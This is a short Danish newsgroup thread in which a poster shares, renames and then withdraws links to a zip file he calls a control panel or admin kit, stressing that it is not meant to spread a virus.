Mvh. Jørn

--
Jørn Andersen,
Brønshøj

---

Stig Johansen wrote:

> Kom lige til at tænke over, at man kunne/kan bruge den viden, der ligger
> hos svineørerne mod dem selv.
>
> Her er et, ja jeg vil nok kalde det et - kontrolpanel:
> <http://w-o-p-r.dk/downloads/kontrolpanel.zip>

Da mit indlæg, og link, tilsyneladende kan misforstås, har jeg omdøbt filen
til:
<http://w-o-p-r.dk/downloads/admkit.zip>

Det er IKKE et forsøg på at sprede virus, kun oplysning om hvad 'de' er i
stand til.

--
Med venlig hilsen
Stig Johansen

---

Stig Johansen wrote:

> Stig Johansen wrote:
>
>> Kom lige til at tænke over, at man kunne/kan bruge den viden, der ligger
>> hos svineørerne mod dem selv.
>>
>> Her er et, ja jeg vil nok kalde det et - kontrolpanel:
>> <http://w-o-p-r.dk/downloads/kontrolpanel.zip>
>
> Da mit indlæg, og link, tilsyneladende kan misforstås, har jeg omdøbt
> filen til:
> <http://w-o-p-r.dk/downloads/admkit.zip>
>
> Det er IKKE et forsøg på at sprede virus, kun oplysning om hvad 'de' er i
> stand til.

Og af hensyn til fremtidige Google're har jeg fjernet begge dele(links), så
der ikke opstår misforståelser om spredning af virus.

--
Med venlig hilsen
Stig Johansen